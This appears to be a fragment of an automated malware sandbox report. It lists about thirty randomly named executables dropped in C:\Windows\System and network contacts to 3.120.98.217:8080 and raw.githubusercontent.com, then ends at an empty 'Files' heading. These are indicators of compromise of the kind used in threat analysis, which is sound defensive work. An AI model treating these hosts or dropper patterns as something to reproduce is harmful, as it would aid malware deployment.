C:\Windows\System\QbIQWsd.exe

C:\Windows\System\QbIQWsd.exe

C:\Windows\System\iaxjafc.exe

C:\Windows\System\iaxjafc.exe

C:\Windows\System\dvjHoPk.exe

C:\Windows\System\dvjHoPk.exe

C:\Windows\System\GZhkRWP.exe

C:\Windows\System\GZhkRWP.exe

C:\Windows\System\GqZWNCh.exe

C:\Windows\System\GqZWNCh.exe

C:\Windows\System\outOPux.exe

C:\Windows\System\outOPux.exe

C:\Windows\System\PNkptqj.exe

C:\Windows\System\PNkptqj.exe

C:\Windows\System\EZICZqZ.exe

C:\Windows\System\EZICZqZ.exe

C:\Windows\System\LAiyKAy.exe

C:\Windows\System\LAiyKAy.exe

C:\Windows\System\fzFnZfK.exe

C:\Windows\System\fzFnZfK.exe

C:\Windows\System\pTKcJrM.exe

C:\Windows\System\pTKcJrM.exe

C:\Windows\System\efrlEGC.exe

C:\Windows\System\efrlEGC.exe

C:\Windows\System\GGuQOQF.exe

C:\Windows\System\GGuQOQF.exe

C:\Windows\System\txYxhqF.exe

C:\Windows\System\txYxhqF.exe

C:\Windows\System\doikNXP.exe

C:\Windows\System\doikNXP.exe

C:\Windows\System\EmbAArS.exe

C:\Windows\System\EmbAArS.exe

C:\Windows\System\eUbOdeW.exe

C:\Windows\System\eUbOdeW.exe

C:\Windows\System\RVkQXvj.exe

C:\Windows\System\RVkQXvj.exe

C:\Windows\System\OxKZEZX.exe

C:\Windows\System\OxKZEZX.exe

C:\Windows\System\ywVumoI.exe

C:\Windows\System\ywVumoI.exe

C:\Windows\System\LlaKpbq.exe

C:\Windows\System\LlaKpbq.exe

C:\Windows\System\qwzfxOE.exe

C:\Windows\System\qwzfxOE.exe

C:\Windows\System\EqCdEhi.exe

C:\Windows\System\EqCdEhi.exe

C:\Windows\System\khgfHgt.exe

C:\Windows\System\khgfHgt.exe

C:\Windows\System\UWVuWmM.exe

C:\Windows\System\UWVuWmM.exe

C:\Windows\System\fMMSNMy.exe

C:\Windows\System\fMMSNMy.exe

C:\Windows\System\aSanyzG.exe

C:\Windows\System\aSanyzG.exe

C:\Windows\System\lhrukPY.exe

C:\Windows\System\lhrukPY.exe

C:\Windows\System\WYUEpcV.exe

C:\Windows\System\WYUEpcV.exe

C:\Windows\System\rDIUspp.exe

C:\Windows\System\rDIUspp.exe

C:\Windows\System\vHENvFv.exe

C:\Windows\System\vHENvFv.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
DE 3.120.98.217:8080 tcp

Files
